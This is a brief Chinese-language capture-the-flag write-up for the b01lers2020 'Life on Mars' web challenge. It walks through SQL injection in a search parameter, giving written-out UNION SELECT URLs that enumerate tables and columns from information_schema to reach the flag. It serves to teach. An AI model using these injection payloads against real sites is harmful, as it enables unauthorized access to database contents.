[b01lers2020]Life on Mars WRITE UP

拿到网站没啥好说的，基本是静态的页面，先抓包。

发现包有问题，search参数 非常的奇怪 经初步判定有SQL注入

ORDER BY 2 得到 有两个参数

进行联合查询,得到所有数据库的名称

发现有个贼奇怪的 叫alien_code 进去看看

/query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27alien_code%27

发现有一个表叫做 code

查表中字段
/query?search=amazonis_planitia%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27code%27

flag就藏在code中
轻松拿到flag